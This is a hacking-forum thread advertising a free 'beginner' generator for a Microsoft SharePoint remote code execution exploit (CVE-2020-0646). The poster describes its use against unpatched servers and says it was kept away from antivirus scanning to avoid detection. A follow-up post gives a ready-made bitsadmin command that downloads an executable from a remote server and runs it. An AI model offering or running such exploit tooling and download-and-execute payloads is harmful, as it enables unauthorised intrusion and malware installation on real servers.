Niflheim World

Welcome to Niflheim !

  • First 5 messages from new users (pre-moderated user) will be checked for flood/spam before being posted on the forum. Users will also be checked for a multi-account.
    If you want to communicate without delay, get a free Huscarl status (how to get - User Groups), or buy premium status (how to buy - Premium status)

[FOR BEGINNERS] MICROSOFT SHAREPOINT RCE (CVE-2020-0646) GENERATOR - FREE DOWNLOAD


hacxx

Local User
Bond
Joined
Sep 28, 2020
Messages
1,477
Reaction score
38
NL COIN
4,783


MICROSOFT SHAREPOINT RCE (CVE-2020-0646) GENERATOR
- Is a code generator that generate a .XOML code and a C# code that once uploaded (.XOML file) or compiled (C#) in SharePoint will remote execute the command in the server. Works on SharePoint On-Premise without January 2020 .NET Patch.

Tested with:
Code:
Windows Server 2012 R2 Standard with June 2019 patch
Download 1:

Download 2:

Virus Scan:
Not send virustotal to avoid been detected. Virustotal sends all samples to antivirus companies.
Use a different service to check...

Notes about this issue:
SharePoint is include with Windows Server and the purpose of Windows Server is to manage and serve a network of computers. Since the release of 2003 it become popular between local networks. In 2020 the logic step of Windows Server is to eliminate local devices while having all the network components.

The technology is so advanced that it only require a monitor, a mouse, a keyboard, lan connection and Windows Server manage all the rest like settings, files, etc. To start it only require a admin to setup a profile and the user work under that profile and all is saved and maintained on the server.

SharePoint is one of the apps that is include with Windows Server and the exploit here available provide to low end authenticated users a flaw that allow remote code execution directly in the server. In a permission based network only admin should have access to the server and in most cases only with local access is possible to manage it. This type of flaw bypass this restriction and if guests is allowed to use the network than anyone with local access to a computer can execute commands or install malware in the server machine.
 

hacxx

Local User
Bond
Joined
Sep 28, 2020
Messages
1,477
Reaction score
38
NL COIN
4,783
For the generator anyone can use the following command line...
Code:
cmd.exe /c bitsadmin /transfer Kunami /download /priority high http://remoteserver.com/1.exe c:\windows\temp\1.exe & start c:\windows\temp\1.exe
(Works on older systems)
 
shape1
shape2
shape3
shape4
shape7
shape8
Top